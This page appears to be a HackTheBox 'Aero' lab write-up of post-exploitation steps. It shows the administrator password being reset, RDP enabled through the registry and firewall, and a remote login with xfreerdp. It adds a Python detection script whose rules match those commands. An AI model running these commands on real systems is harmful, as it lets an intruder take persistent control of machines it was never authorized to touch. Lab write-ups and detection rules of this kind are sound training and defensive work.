Beyond


This page covers the additional post-exploitation enumeration and assessment conducted as SYSTEM after compromising the target system.

ps c:\Users\sam.emerson\Documents> net user administrator Qwer1234
The command completed successfully.

Password reset for the administrator user

ps c:\Users\sam.emerson\Documents> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
 
ps c:\Users\sam.emerson\Documents> netsh firewall add portopening TCP 3389 "Remote Desktop"
 
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
 
Ok.

RDP enabled

┌──(kali㉿kali)-[~/archive/htb/labs/aero]
└─$ xfreerdp /u:administrator /p:Qwer1234 /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0   

RDP
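
The three host-side changes above (a local password set with net user, fDenyTSConnections set to 0, and TCP 3389 opened in the firewall) leave command lines that defenders can match in process-creation logging. The following Python is an added example, not part of the original write-up: it assumes command lines are being collected (for example Security event 4688 with command-line auditing, or Sysmon event ID 1), and the rule names, the `normalize` and `hunt` helpers and the sample lines are all constructed for illustration.

```python
import re

# Rules for the three host-side changes shown above (rule names are illustrative).
RULES = [
    # net user <account> <password>: a third argument that is not a /switch sets a password
    ("local-account-password-set",
     re.compile(r"^net1?(?:\.exe)?\s+user\s+\S+\s+[^/\s]\S*", re.I)),
    # reg add ...\Terminal Server /v fDenyTSConnections /d 0: RDP connections allowed
    ("rdp-enabled-via-registry",
     re.compile(r"^reg(?:\.exe)?\s+add\s+.*terminal server.*\s/v\s+fDenyTSConnections\b"
                r".*\s/d\s+(?:0x)?0+\b", re.I)),
    # legacy "netsh firewall add portopening" or "netsh advfirewall firewall add rule" on 3389
    ("firewall-opened-3389",
     re.compile(r"^netsh(?:\.exe)?\s+(?:advfirewall\s+)?firewall\s+add\s+"
                r"(?:portopening|rule)\b(?!.*action=block).*\b3389\b", re.I)),
]

def normalize(cmdline):
    """Collapse whitespace and reduce the image path to its file name."""
    s = " ".join(cmdline.split())
    if s.startswith('"'):
        image, _, rest = s[1:].partition('"')
    else:
        image, _, rest = s.partition(" ")
    base = re.split(r"[\\/]", image)[-1]
    return (base + " " + rest.strip()).strip()

def hunt(cmdlines):
    """Return (line_index, rule_name) for every command line that matches a rule."""
    hits = []
    for i, raw in enumerate(cmdlines):
        cmd = normalize(raw)
        hits += [(i, name) for name, rx in RULES if rx.search(cmd)]
    return hits

# Constructed sample command lines (not taken from a real host); 1, 3 and 6 are benign.
SAMPLE = [
    r'C:\Windows\system32\net.exe user administrator Example-Passw0rd',
    r'net user administrator /active:yes',
    r'"C:\Windows\system32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f',
    r'netsh firewall add portopening TCP 3389 "Remote Desktop"',
    r'netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=TCP localport=3389',
    r'netsh advfirewall firewall add rule name="No RDP" dir=in action=block protocol=TCP localport=3389',
]

if __name__ == "__main__":
    for idx, rule in hunt(SAMPLE):
        print(f"{rule}: {SAMPLE[idx]}")
```

The findings carry only the line index and rule name, so a password passed on the command line is not copied into alert output.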

Version


10.0.22000.1761

Scheduled Tasks


\AeroHub Startup

Aero.exe is the web app